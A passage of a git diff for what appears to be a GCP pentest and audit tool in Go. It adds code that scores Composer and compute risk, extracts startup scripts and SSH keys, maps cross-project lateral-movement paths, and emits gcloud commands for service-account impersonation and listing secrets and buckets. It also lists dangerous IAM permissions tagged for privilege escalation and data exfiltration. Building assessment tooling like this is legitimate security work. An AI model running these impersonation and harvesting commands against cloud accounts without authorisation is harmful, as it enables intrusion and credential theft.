string `json:"airflowUri"` + DagGcsPrefix string `json:"dagGcsPrefix"` + AirflowVersion string `json:"airflowVersion"` + PythonVersion string `json:"pythonVersion"` + ImageVersion string `json:"imageVersion"` + + // Node config + MachineType string `json:"machineType"` + DiskSizeGb int64 `json:"diskSizeGb"` + NodeCount int64 `json:"nodeCount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + ServiceAccount string `json:"serviceAccount"` + + // Security config + PrivateEnvironment bool `json:"privateEnvironment"` + WebServerAllowedIPs []string `json:"webServerAllowedIps"` + EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListEnvironments retrieves all Composer environments in a project +func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, error) { + ctx := context.Background() + var service *composer.Service + var err error + + if s.session != nil { + service, err = composer.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = composer.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Composer service: %v", err) + } + + var environments []EnvironmentInfo + + // List environments across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Environments.List(parent) + err = req.Pages(ctx, func(page *composer.ListEnvironmentsResponse) error { + for _, env := range page.Environments { + info := s.parseEnvironment(env, projectID) + environments = append(environments, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list Composer environments: %v", err) + } + + return environments, nil +} + +// parseEnvironment converts a Composer environment to EnvironmentInfo +func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID string) EnvironmentInfo { + info := EnvironmentInfo{ + Name: extractName(env.Name), + ProjectID: projectID, + Location: extractLocation(env.Name), + State: env.State, + CreateTime: env.CreateTime, + UpdateTime: env.UpdateTime, + RiskReasons: []string{}, + } + + if env.Config != nil { + // Airflow config + if env.Config.AirflowUri != "" { + info.AirflowURI = env.Config.AirflowUri + } + info.DagGcsPrefix = env.Config.DagGcsPrefix + + // Software config + if env.Config.SoftwareConfig != nil { + info.AirflowVersion = env.Config.SoftwareConfig.AirflowConfigOverrides["core-dags_are_paused_at_creation"] + info.PythonVersion = env.Config.SoftwareConfig.PythonVersion + info.ImageVersion = env.Config.SoftwareConfig.ImageVersion + } + + // Node config + if env.Config.NodeConfig != nil { + info.MachineType = env.Config.NodeConfig.MachineType + info.DiskSizeGb = env.Config.NodeConfig.DiskSizeGb + info.Network = env.Config.NodeConfig.Network + info.Subnetwork = env.Config.NodeConfig.Subnetwork + info.ServiceAccount = env.Config.NodeConfig.ServiceAccount + } + + info.NodeCount = env.Config.NodeCount + + // Private environment config + if env.Config.PrivateEnvironmentConfig != nil { + info.PrivateEnvironment = env.Config.PrivateEnvironmentConfig.EnablePrivateEnvironment + // EnablePrivateEndpoint is part of PrivateClusterConfig, not PrivateEnvironmentConfig + if env.Config.PrivateEnvironmentConfig.PrivateClusterConfig != nil { + info.EnablePrivateEndpoint = env.Config.PrivateEnvironmentConfig.PrivateClusterConfig.EnablePrivateEndpoint + } + } + + // Web server network access control + if env.Config.WebServerNetworkAccessControl != nil { + for _, cidr := range env.Config.WebServerNetworkAccessControl.AllowedIpRanges { + info.WebServerAllowedIPs = append(info.WebServerAllowedIPs, cidr.Value) + } + } + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeEnvironmentRisk(info) + + return info +} + +// analyzeEnvironmentRisk determines the risk level of a Composer environment +func (s *ComposerService) analyzeEnvironmentRisk(env EnvironmentInfo) (string, []string) { + var reasons []string + score := 0 + + // Public Airflow UI + if !env.PrivateEnvironment { + reasons = append(reasons, "Not using private environment") + score += 2 + } + + // Public endpoint + if !env.EnablePrivateEndpoint && env.AirflowURI != "" { + reasons = append(reasons, "Airflow web server has public endpoint") + score += 2 + } + + // No IP restrictions or 0.0.0.0/0 + if len(env.WebServerAllowedIPs) == 0 { + reasons = append(reasons, "No web server IP restrictions") + score += 1 + } else { + for _, ip := range env.WebServerAllowedIPs { + if ip == "0.0.0.0/0" { + reasons = append(reasons, "Web server allows all IPs (0.0.0.0/0)") + score += 2 + break + } + } + } + + // Default service account + if env.ServiceAccount == "" || strings.Contains(env.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index bb87fe77..e4c91dc4 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -70,6 +70,12 @@ type ComputeEngineInfo struct { OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` // OS Login 2FA enabled SerialPortEnabled bool `json:"serialPortEnabled"` // Serial port access enabled + // Pentest-specific fields: actual content extraction + StartupScriptContent string `json:"startupScriptContent"` // Actual startup script content + StartupScriptURL string `json:"startupScriptURL"` // URL to startup script if remote + SSHKeys []string `json:"sshKeys"` // Extracted SSH keys + CustomMetadata []string `json:"customMetadata"` // Other custom metadata keys + // Disk encryption BootDiskEncryption string `json:"bootDiskEncryption"` // "Google-managed", "CMEK", or "CSEK" BootDiskKMSKey string `json:"bootDiskKMSKey"` // KMS key for CMEK @@ -79,6 +85,30 @@ type ComputeEngineInfo struct { LastStartTimestamp string `json:"lastStartTimestamp"` } +// ProjectMetadataInfo contains project-level metadata security info +type ProjectMetadataInfo struct { + ProjectID string `json:"projectId"` + HasProjectSSHKeys bool `json:"hasProjectSSHKeys"` + ProjectSSHKeys []string `json:"projectSSHKeys"` + HasProjectStartupScript bool `json:"hasProjectStartupScript"` + ProjectStartupScript string `json:"projectStartupScript"` + OSLoginEnabled bool `json:"osLoginEnabled"` + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` + SerialPortEnabled bool `json:"serialPortEnabled"` + CustomMetadataKeys []string `json:"customMetadataKeys"` +} + +// InstanceIAMInfo contains IAM policy info for an instance +type InstanceIAMInfo struct { + InstanceName string `json:"instanceName"` + Zone string `json:"zone"` + ProjectID string `json:"projectId"` + ComputeAdmins []string `json:"computeAdmins"` // compute.admin or owner + InstanceAdmins []string `json:"instanceAdmins"` // compute.instanceAdmin + SSHUsers []string `json:"sshUsers"` // compute.osLogin or osAdminLogin + MetadataSetters []string `json:"metadataSetters"` // compute.instances.setMetadata +} + // getService returns a compute service, using session if available func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Service, error) { if ces.session != nil { @@ -145,10 +175,19 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf info.ConfidentialVM = instance.ConfidentialInstanceConfig.EnableConfidentialCompute } - // Parse metadata for security-relevant items + // Parse metadata for security-relevant items including content if instance.Metadata != nil { - info.HasStartupScript, info.HasSSHKeys, info.BlockProjectSSHKeys, - info.OSLoginEnabled, info.OSLogin2FAEnabled, info.SerialPortEnabled = parseMetadata(instance.Metadata) + metaResult := parseMetadataFull(instance.Metadata) + info.HasStartupScript = metaResult.HasStartupScript + info.HasSSHKeys = metaResult.HasSSHKeys + info.BlockProjectSSHKeys = metaResult.BlockProjectSSHKeys + info.OSLoginEnabled = metaResult.OSLoginEnabled + info.OSLogin2FAEnabled = metaResult.OSLogin2FA + info.SerialPortEnabled = metaResult.SerialPortEnabled + info.StartupScriptContent = metaResult.StartupScriptContent + info.StartupScriptURL = metaResult.StartupScriptURL + info.SSHKeys = metaResult.SSHKeys + info.CustomMetadata = metaResult.CustomMetadata } // Parse boot disk encryption @@ -231,10 +270,46 @@ func parseServiceAccounts(sas []*compute.ServiceAccount, projectID string) ([]Se return accounts, hasDefaultSA, hasCloudScopes } +// MetadataParseResult contains all parsed metadata fields +type MetadataParseResult struct { + HasStartupScript bool + HasSSHKeys bool + BlockProjectSSHKeys bool + OSLoginEnabled bool + OSLogin2FA bool + SerialPortEnabled bool + StartupScriptContent string + StartupScriptURL string + SSHKeys []string + CustomMetadata []string +} + // parseMetadata checks instance metadata for security-relevant settings func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, blockProjectSSHKeys, osLoginEnabled, osLogin2FA, serialPortEnabled bool) { + result := parseMetadataFull(metadata) + return result.HasStartupScript, result.HasSSHKeys, result.BlockProjectSSHKeys, + result.OSLoginEnabled, result.OSLogin2FA, result.SerialPortEnabled +} + +// parseMetadataFull extracts all metadata including content +func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { + result := MetadataParseResult{} if metadata == nil || metadata.Items == nil { - return + return result + } + + // Known metadata keys to exclude from custom metadata + knownKeys := map[string]bool{ + "startup-script": true, + "startup-script-url": true, + "ssh-keys": true, + "sshKeys": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, } for _, item := range metadata.Items { @@ -243,30 +318,53 @@ func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, bl } switch item.Key { - case "startup-script", "startup-script-url": - hasStartupScript = true + case "startup-script": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptContent = *item.Value + } + case "startup-script-url": + result.HasStartupScript = true + if item.Value != nil { + result.StartupScriptURL = *item.Value + } case "ssh-keys", "sshKeys": - hasSSHKeys = true + result.HasSSHKeys = true + if item.Value != nil { + // Parse SSH keys - format is "user:ssh-rsa KEY comment" + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + result.SSHKeys = append(result.SSHKeys, line) + } + } + } case "block-project-ssh-keys": if item.Value != nil && *item.Value == "true" { - blockProjectSSHKeys = true + result.BlockProjectSSHKeys = true } case "enable-oslogin": if item.Value != nil && strings.ToLower(*item.Value) == "true" { - osLoginEnabled = true + result.OSLoginEnabled = true } case "enable-oslogin-2fa": if item.Value != nil && strings.ToLower(*item.Value) == "true" { - osLogin2FA = true + result.OSLogin2FA = true } case "serial-port-enable": if item.Value != nil && *item.Value == "true" { - serialPortEnabled = true + result.SerialPortEnabled = true + } + default: + // Track custom metadata keys (may contain secrets) + if !knownKeys[item.Key] { + result.CustomMetadata = append(result.CustomMetadata, item.Key) } } } - return + return result } // parseBootDiskEncryption checks the boot disk encryption type @@ -309,3 +407,145 @@ func FormatScopes(scopes []string) string { } return strings.Join(shortScopes, ", ") } + +// GetProjectMetadata retrieves project-level compute metadata +func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectMetadataInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return nil, fmt.Errorf("failed to get project metadata: %v", err) + } + + info := &ProjectMetadataInfo{ + ProjectID: projectID, + } + + if project.CommonInstanceMetadata != nil { + for _, item := range project.CommonInstanceMetadata.Items { + if item == nil { + continue + } + + switch item.Key { + case "ssh-keys", "sshKeys": + info.HasProjectSSHKeys = true + if item.Value != nil { + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + info.ProjectSSHKeys = append(info.ProjectSSHKeys, line) + } + } + } + case "startup-script": + info.HasProjectStartupScript = true + if item.Value != nil { + info.ProjectStartupScript = *item.Value + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLogin2FAEnabled = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + info.SerialPortEnabled = true + } + default: + // Track other custom metadata that might contain secrets + if !isKnownMetadataKey(item.Key) { + info.CustomMetadataKeys = append(info.CustomMetadataKeys, item.Key) + } + } + } + } + + return info, nil +} + +// isKnownMetadataKey checks if a metadata key is a known system key +func isKnownMetadataKey(key string) bool { + knownKeys := map[string]bool{ + "ssh-keys": true, + "sshKeys": true, + "startup-script": true, + "startup-script-url": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, + "google-compute-enable-logging": true, + "google-compute-enable-ssh-agent": true, + } + return knownKeys[key] +} + +// GetInstanceIAMPolicy retrieves IAM policy for a specific instance +func (ces *ComputeEngineService) GetInstanceIAMPolicy(projectID, zone, instanceName string) (*InstanceIAMInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instanceName).Do() + if err != nil { + return nil, fmt.Errorf("failed to get instance IAM policy: %v", err) + } + + info := &InstanceIAMInfo{ + InstanceName: instanceName, + Zone: zone, + ProjectID: projectID, + } + + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + switch binding.Role { + case "roles/compute.admin", "roles/owner": + info.ComputeAdmins = append(info.ComputeAdmins, binding.Members...) + case "roles/compute.instanceAdmin", "roles/compute.instanceAdmin.v1": + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + case "roles/compute.osLogin", "roles/compute.osAdminLogin": + info.SSHUsers = append(info.SSHUsers, binding.Members...) + } + + // Check for specific permissions via custom roles (more complex detection) + if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { + // Custom role - would need to check permissions, but we note the binding + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + } + } + + return info, nil +} + +// InstancesWithMetadata retrieves instances with full metadata content +func (ces *ComputeEngineService) InstancesWithMetadata(projectID string) ([]ComputeEngineInfo, *ProjectMetadataInfo, error) { + instances, err := ces.Instances(projectID) + if err != nil { + return nil, nil, err + } + + projectMeta, err := ces.GetProjectMetadata(projectID) + if err != nil { + // Don't fail if we can't get project metadata + projectMeta = &ProjectMetadataInfo{ProjectID: projectID} + } + + return instances, projectMeta, nil +} diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go new file mode 100644 index 00000000..d04f746b --- /dev/null +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -0,0 +1,423 @@ +package crossprojectservice + +import ( + "context" + "fmt" + "strings" + + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" +) + +type CrossProjectService struct{} + +func New() *CrossProjectService { + return &CrossProjectService{} +} + +// CrossProjectBinding represents a cross-project IAM binding +type CrossProjectBinding struct { + SourceProject string `json:"sourceProject"` // Where the principal is from + TargetProject string `json:"targetProject"` // Where access is granted + Principal string `json:"principal"` // The service account or user + PrincipalType string `json:"principalType"` // serviceAccount, user, group + Role string `json:"role"` // The IAM role granted + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` // Why it's risky + ExploitCommands []string `json:"exploitCommands"` // Commands for exploitation +} + +// CrossProjectServiceAccount represents a service account that may have cross-project access +type CrossProjectServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + UniqueID string `json:"uniqueId"` + TargetAccess []string `json:"targetAccess"` // Other projects this SA can access +} + +// LateralMovementPath represents a potential lateral movement path +type LateralMovementPath struct { + SourceProject string `json:"sourceProject"` + SourcePrincipal string `json:"sourcePrincipal"` + TargetProject string `json:"targetProject"` + AccessMethod string `json:"accessMethod"` // e.g., "impersonation", "direct role" + TargetRoles []string `json:"targetRoles"` + PrivilegeLevel string `json:"privilegeLevel"` // ADMIN, WRITE, READ + ExploitCommands []string `json:"exploitCommands"` +} + +// AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects +func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([]CrossProjectBinding, error) { + ctx := context.Background() + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Resource Manager service: %v", err) + } + + var crossProjectBindings []CrossProjectBinding + + // Build a map of project IDs for quick lookup + projectMap := make(map[string]bool) + for _, pid := range projectIDs { + projectMap[pid] = true + } + + // Analyze IAM policy of each project + for _, targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue // Skip projects we can't access + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sourceProject := extractProjectFromMember(member) + + // Check if this is cross-project access + if sourceProject != "" && sourceProject != targetProject { + // Check if source project is in our analysis scope + isFromKnownProject := projectMap[sourceProject] + + cpBinding := CrossProjectBinding{ + SourceProject: sourceProject, + TargetProject: targetProject, + Principal: member, + PrincipalType: extractPrincipalType(member), + Role: binding.Role, + RiskReasons: []string{}, + } + + // Analyze risk level + cpBinding.RiskLevel, cpBinding.RiskReasons = s.analyzeBindingRisk(binding.Role, member, isFromKnownProject) + cpBinding.ExploitCommands = s.generateExploitCommands(cpBinding) + + crossProjectBindings = append(crossProjectBindings, cpBinding) + } + } + } + } + + return crossProjectBindings, nil +} + +// GetCrossProjectServiceAccounts finds service accounts with cross-project access +func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string) ([]CrossProjectServiceAccount, error) { + ctx := context.Background() + + iamService, err := iam.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Resource Manager service: %v", err) + } + + var crossProjectSAs []CrossProjectServiceAccount + + // Build a map of all service accounts by email -> project + saProjectMap := make(map[string]string) + allSAs := make(map[string]*CrossProjectServiceAccount) + + // List all service accounts in each project + for _, projectID := range projectIDs { + req := iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID)) + err := req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saProjectMap[sa.Email] = projectID + allSAs[sa.Email] = &CrossProjectServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + DisplayName: sa.DisplayName, + UniqueID: sa.UniqueId, + TargetAccess: []string{}, + } + } + return nil + }) + if err != nil { + continue // Skip on error + } + } + + // Now check each project's IAM policy for service accounts from other projects + for _, targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if strings.HasPrefix(member, "serviceAccount:") { + email := strings.TrimPrefix(member, "serviceAccount:") + sourceProject := saProjectMap[email] + + // Cross-project access + if sourceProject != "" && sourceProject != targetProject { + if sa, exists := allSAs[email]; exists { + accessDesc := fmt.Sprintf("%s: %s", targetProject, binding.Role) + sa.TargetAccess = append(sa.TargetAccess, accessDesc) + } + } + } + } + } + } + + // Collect SAs with cross-project access + for _, sa := range allSAs { + if len(sa.TargetAccess) > 0 { + crossProjectSAs = append(crossProjectSAs, *sa) + } + } + + return crossProjectSAs, nil +} + +// FindLateralMovementPaths identifies lateral movement paths between projects +func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string) ([]LateralMovementPath, error) { + ctx := context.Background() + + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Resource Manager service: %v", err) + } + + var paths []LateralMovementPath + + // Analyze each project pair + for _, sourceProject := range projectIDs { + for _, targetProject := range projectIDs { + if sourceProject == targetProject { + continue + } + + // Get target project IAM policy + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + // Find principals from source project that have access to target + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + memberProject := extractProjectFromMember(member) + if memberProject == sourceProject { + path := LateralMovementPath{ + SourceProject: sourceProject, + SourcePrincipal: member, + TargetProject: targetProject, + AccessMethod: "Direct IAM Role", + TargetRoles: []string{binding.Role}, + PrivilegeLevel: categorizePrivilegeLevel(binding.Role), + } + path.ExploitCommands = s.generateLateralMovementCommands(path) + paths = append(paths, path) + } + } + } + } + } + + return paths, nil +} + +// analyzeBindingRisk determines the risk level of a cross-project binding +func (s *CrossProjectService) analyzeBindingRisk(role, member string, isFromKnownProject bool) (string, []string) { + var reasons []string + score := 0 + + // High-privilege roles + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.securityAdmin": true, + "roles/compute.admin": true, + "roles/storage.admin": true, + "roles/secretmanager.admin": true, + } + + if highPrivRoles[role] { + reasons = append(reasons, fmt.Sprintf("High-privilege role: %s", role)) + score += 3 + } + + // Admin/editor roles are always concerning + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + reasons = append(reasons, "Role contains 'admin' permissions") + score += 2 + } + + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + reasons = append(reasons, "Role contains 'editor' permissions") + score += 2 + } + + // Service account cross-project is higher risk than user + if strings.HasPrefix(member, "serviceAccount:") { + reasons = append(reasons, "Service account has cross-project access (can be automated)") + score += 1 + } + + // Unknown source project is concerning + if !isFromKnownProject { + reasons = append(reasons, "Access from project outside analyzed scope") + score += 1 + } + + if score >= 4 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// generateExploitCommands generates exploitation commands for a cross-project binding +func (s *CrossProjectService) generateExploitCommands(binding CrossProjectBinding) []string { + var commands []string + + if binding.PrincipalType == "serviceAccount" { + email := strings.TrimPrefix(binding.Principal, "serviceAccount:") + + commands = append(commands, + fmt.Sprintf("# Impersonate SA from %s to access %s:", binding.SourceProject, binding.TargetProject), + fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), + fmt.Sprintf("# Then use token to access target project:"), + fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", binding.TargetProject, email), + ) + } + + // Role-specific exploitation + if strings.Contains(binding.Role, "storage") { + commands = append(commands, + fmt.Sprintf("# List buckets in target project:"), + fmt.Sprintf("gsutil ls -p %s", binding.TargetProject), + ) + } + + if strings.Contains(binding.Role, "compute") { + commands = append(commands, + fmt.Sprintf("# List instances in target project:"), + fmt.Sprintf("gcloud compute instances list --project=%s", binding.TargetProject), + ) + } + + if strings.Contains(binding.Role, "secretmanager") { + commands = append(commands, + fmt.Sprintf("# List secrets in target project:"), + fmt.Sprintf("gcloud secrets list --project=%s", binding.TargetProject), + ) + } + + return commands +} + +// generateLateralMovementCommands generates commands for lateral movement +func (s *CrossProjectService) generateLateralMovementCommands(path LateralMovementPath) []string { + var commands []string + + if strings.HasPrefix(path.SourcePrincipal, "serviceAccount:") { + email := strings.TrimPrefix(path.SourcePrincipal, "serviceAccount:") + + commands = append(commands, + fmt.Sprintf("# Lateral movement from %s to %s via SA impersonation:", path.SourceProject, path.TargetProject), + fmt.Sprintf("# 1. Get access token for the cross-project SA:"), + fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), + fmt.Sprintf("# 2. Use the SA to access target project:"), + ) + + // Add role-specific commands + for _, role := range path.TargetRoles { + if strings.Contains(role, "owner") || strings.Contains(role, "editor") { + commands = append(commands, + fmt.Sprintf("# Full project access with %s:", role), + fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", path.TargetProject, email), + ) + } + } + } + + return commands +} + +// extractProjectFromMember extracts the project ID from a member string +func extractProjectFromMember(member string) string { + // serviceAccount:sa-name@project-id.iam.gserviceaccount.com + if strings.HasPrefix(member, "serviceAccount:") { + email := strings.TrimPrefix(member, "serviceAccount:") + // Format: name@project-id.iam.gserviceaccount.com + // or: project-id@project-id.iam.gserviceaccount.com + if strings.Contains(email, ".iam.gserviceaccount.com") { + parts := strings.Split(email, "@") + if len(parts) == 2 { + domain := parts[1] + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + } + // App Engine default service accounts + if strings.Contains(email, "@appspot.gserviceaccount.com") { + parts := strings.Split(email, "@") + if len(parts) == 2 { + return strings.TrimSuffix(parts[1], ".appspot.gserviceaccount.com") + } + } + // Compute Engine default service accounts: project-number@project.iam.gserviceaccount.com + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + // Can't extract project ID from project number easily + return "" + } + } + return "" +} + +// extractPrincipalType extracts the type of principal from a member string +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +// categorizePrivilegeLevel categorizes the privilege level of a role +func categorizePrivilegeLevel(role string) string { + if strings.Contains(role, "owner") || strings.Contains(role, "Owner") { + return "ADMIN" + } + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + return "ADMIN" + } + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + return "WRITE" + } + if strings.Contains(role, "writer") || strings.Contains(role, "Writer") { + return "WRITE" + } + if strings.Contains(role, "creator") || strings.Contains(role, "Creator") { + return "WRITE" + } + if strings.Contains(role, "viewer") || strings.Contains(role, "Viewer") { + return "READ" + } + if strings.Contains(role, "reader") || strings.Contains(role, "Reader") { + return "READ" + } + return "READ" // Default to READ for unknown +} diff --git a/gcp/services/customRolesService/customRolesService.go b/gcp/services/customRolesService/customRolesService.go new file mode 100644 index 00000000..9a0589cf --- /dev/null +++ b/gcp/services/customRolesService/customRolesService.go @@ -0,0 +1,284 @@ +package customrolesservice + +import ( + "context" + "fmt" + "strings" + + iam "google.golang.org/api/iam/v1" +) + +type CustomRolesService struct{} + +func New() *CustomRolesService { + return &CustomRolesService{} +} + +// CustomRoleInfo represents a custom IAM role +type CustomRoleInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + Stage string `json:"stage"` // ALPHA, BETA, GA, DEPRECATED + Deleted bool `json:"deleted"` + IncludedPermissions []string `json:"includedPermissions"` + PermissionCount int `json:"permissionCount"` + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + DangerousPerms []string `json:"dangerousPermissions"` + PrivescPerms []string `json:"privescPermissions"` +} + +// RolePermissionAnalysis contains detailed analysis of role permissions +type RolePermissionAnalysis struct { + RoleName string `json:"roleName"` + ProjectID string `json:"projectId"` + TotalPermissions int `json:"totalPermissions"` + DangerousCount int `json:"dangerousCount"` + PrivescCount int `json:"privescCount"` + PermissionsByType map[string]int `json:"permissionsByType"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` +} + +// DangerousPermission defines a dangerous permission with its risk category +type DangerousPermission struct { + Permission string + Category string // privesc, data_exfil, persistence, lateral_movement + Description string + RiskLevel string // CRITICAL, HIGH, MEDIUM +} + +// GetDangerousPermissions returns the list of dangerous permissions +func (s *CustomRolesService) GetDangerousPermissions() []DangerousPermission { + return []DangerousPermission{ + // Privilege Escalation - CRITICAL + {Permission: "iam.serviceAccountKeys.create", Category: "privesc", Description: "Create SA keys for persistent access", RiskLevel: "CRITICAL"}, + {Permission: "iam.serviceAccountTokenCreator", Category: "privesc", Description: "Generate access tokens for any SA", RiskLevel: "CRITICAL"}, + {Permission: "iam.serviceAccounts.getAccessToken", Category: "privesc", Description: "Get access token for SA", RiskLevel: "CRITICAL"}, + {Permission: "iam.serviceAccounts.signBlob", Category: "privesc", Description: "Sign blobs as SA", RiskLevel: "CRITICAL"}, + {Permission: "iam.serviceAccounts.signJwt", Category: "privesc", Description: "Sign JWTs as SA", RiskLevel: "CRITICAL"}, + {Permission: "iam.serviceAccounts.implicitDelegation", Category: "privesc", Description: "Implicit delegation for SA", RiskLevel: "CRITICAL"}, + {Permission: "iam.serviceAccounts.actAs", Category: "privesc", Description: "Act as service account", RiskLevel: "CRITICAL"}, + {Permission: "resourcemanager.projects.setIamPolicy", Category: "privesc", Description: "Modify project IAM", RiskLevel: "CRITICAL"}, + {Permission: "iam.roles.create", Category: "privesc", Description: "Create custom roles", RiskLevel: "HIGH"}, + {Permission: "iam.roles.update", Category: "privesc", Description: "Modify custom roles", RiskLevel: "HIGH"}, + {Permission: "deploymentmanager.deployments.create", Category: "privesc", Description: "Deploy resources with elevated perms", RiskLevel: "HIGH"}, + {Permission: "cloudfunctions.functions.setIamPolicy", Category: "privesc", Description: "Modify function IAM", RiskLevel: "HIGH"}, + {Permission: "run.services.setIamPolicy", Category: "privesc", Description: "Modify Cloud Run IAM", RiskLevel: "HIGH"}, + + // Data Exfiltration - HIGH + {Permission: "storage.objects.get", Category: "data_exfil", Description: "Read storage objects", RiskLevel: "MEDIUM"}, + {Permission: "storage.objects.list", Category: "data_exfil", Description: "List storage objects", RiskLevel: "LOW"}, + {Permission: "bigquery.tables.getData", Category: "data_exfil", Description: "Read BigQuery data", RiskLevel: "HIGH"}, + {Permission: "secretmanager.versions.access", Category: "data_exfil", Description: "Access secret values", RiskLevel: "CRITICAL"}, + {Permission: "cloudkms.cryptoKeyVersions.useToDecrypt", Category: "data_exfil", Description: "Decrypt with KMS keys", RiskLevel: 